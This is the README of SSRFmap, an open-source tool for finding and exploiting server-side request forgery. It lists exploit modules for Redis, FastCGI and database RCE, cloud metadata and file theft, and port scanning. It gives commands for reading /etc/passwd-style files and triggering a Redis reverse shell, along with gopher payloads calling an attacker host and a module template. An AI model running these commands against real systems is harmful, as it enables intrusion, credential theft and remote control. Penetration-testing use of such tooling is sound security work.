Automatic SSRF fuzzer and exploitation tool
SSRFmap

SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
Summary
* ContributorsModules
The following modules are already implemented and can be used with the -m argument.
| Name | Description | | :------------- | :------------------------------------------------------- | | axfr | DNS zone transfers (AXFR) | | fastcgi | FastCGI RCE | | redis | Redis RCE | | github | Github Enterprise RCE < 2.8.7 | | zabbix | Zabbix RCE | | mysql | MySQL Command execution | | postgres | Postgres Command execution | | docker | Docker Infoleaks via API | | smtp | SMTP send mail | | portscan | Scan top 8000 ports for the host | | networkscan | HTTP Ping sweep over the network | | readfiles | Read files such as /etc/passwd | | alibaba | Read files from the provider (e.g: meta-data, user-data) | | aws | Read files from the provider (e.g: meta-data, user-data) | | gce | Read files from the provider (e.g: meta-data, user-data) | | digitalocean | Read files from the provider (e.g: meta-data, user-data) | | socksproxy | SOCKS4 Proxy | | smbhash | Force an SMB authentication via a UNC Path | | tomcat | Bruteforce attack against Tomcat Manager | | custom | Send custom data to a listening service, e.g: netcat | | memcache | Store data inside the memcache instance |
Install and Manual
- From the Github repository.
$ git clone https://github.com/swisskyrepo/SSRFmap
$ cd SSRFmap/
$ pip3 install -r requirements.txt
$ python3 ssrfmap.py
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER] [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT] [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
optional arguments: -h, --help show this help message and exit -r REQFILE SSRF Request file -p PARAM SSRF Parameter to target -m MODULES SSRF Modules to enable -l HANDLER Start an handler for a reverse shell -v [VERBOSE] Enable verbosity --lhost LHOST LHOST reverse shell or IP to target in the network --lport LPORT LPORT reverse shell or port to target in the network --uagent USERAGENT User Agent to use --ssl [SSL] Use HTTPS without verification --proxy PROXY Use HTTP(s) proxy (ex: http://localhost:8080) --level [LEVEL] Level of test to perform (1-5, default: 1)
- Docker
$ git clone https://github.com/swisskyrepo/SSRFmap
$ docker build --no-cache -t ssrfmap .
$ docker run -it ssrfmap ssrfmap.py [OPTIONS]
$ docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py
Examples
First you need a request with a parameter to fuzz, Burp requests works well with SSRFmap. They should look like the following. More examples are available in the ./examples folder.
POST /ssrf HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://mysimple.ssrf/
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Connection: close
Upgrade-Insecure-Requests: 1
url=https%3A%2F%2Fwww.google.fr
Use the -m followed by module name (separated by a , if you want to launch several modules).
# Launch a portscan on localhost and read default files
python ssrfmap.py -r examples/request.txt -p url -m readfiles,portscan
If you want to inject inside a header, a GET or a POST parameter, you only need to specify the parameter name
python ssrfmap.py -r examples/request6.txt -p X-Custom-Header -m readfiles --rfiles /tmp/test
If you need to have a custom user-agent use the --uagent. Some targets will use HTTPS, you can enable it with --ssl.
# Launch a portscan against an HTTPS endpoint using a custom user-agent
python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell.
# Triggering a reverse shell on a Redis
python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
-l create a listener for reverse shell on the specified port
--lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
When the target is protected by a WAF or some filters you can try a wide range of payloads and encoding with the parameter --level.
# --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...
SSRFmap Tests
A quick way to test the framework can be done with data/example.py SSRF service.
- Local
FLASK_APP=examples/example.py flask run &
python ssrfmap.py -r examples/request.txt -p url -m readfiles
- Docker
docker build --no-cache -t ssrfmap .
# run example ssrf http service docker run -it -v "$(pwd)":/usr/src/app -p 5000:5000 ssrfmap examples/example.py
# run example ssrf dns service docker exec -u root:root -it example python examples/ssrf_dns.py
# run ssrfmap tool docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles
Launch the tests requests:
docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request2.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request3.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request4.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request5.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request6.txt -p X-Custom-Header -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m axfr
docker exec -it example python ssrfmap.py -r examples/request3.txt -p url -m axfr --lhost 127.0.0.1 --lport 53 --ldomain example.lab
Contribute
I :heart: pull requests :) Feel free to add any feature listed below or a new service. - Redis PHP Exploitation - HTTP module (Jenkins ?)
gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body
The following code is a template if you wish to add a module interacting with a service.
from core.utils import *
import logging
name = "servicename in lowercase" description = "ServiceName RCE - What does it do" author = "Name or pseudo of the author" documentation = ["http://linktoaresearch", "http://anotherlink"]
class exploit(): SERVER_HOST = "127.0.0.1" SERVER_PORT = "4242"
def init(self, requester, args): logging.info("Module '{}' launched !".format(name))
# Handle args for reverse shell if args.lhost == None: self.SERVER_HOST = input("Server Host:") else: self.SERVER_HOST = args.lhost
if args.lport == None: self.SERVER_PORT = input("Server Port:") else: self.SERVER_PORT = args.lport
# Data for the service # Using a generator to create the host list # Edit the following ip if you need to target something else genhost = genip_list("127.0.0.1", args.level) for ip in gen_host: port = "6379" data = "*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a" payload = wrapper_gopher(data, ip , port)
# Handle args for reverse shell payload = payload.replace("SERVERHOST", self.SERVERHOST) payload = payload.replace("SERVERPORT", self.SERVERPORT)
# Send the payload r = requester.do_request(args.param, payload)
You can also contribute with a beer IRL or via Github Sponsor button.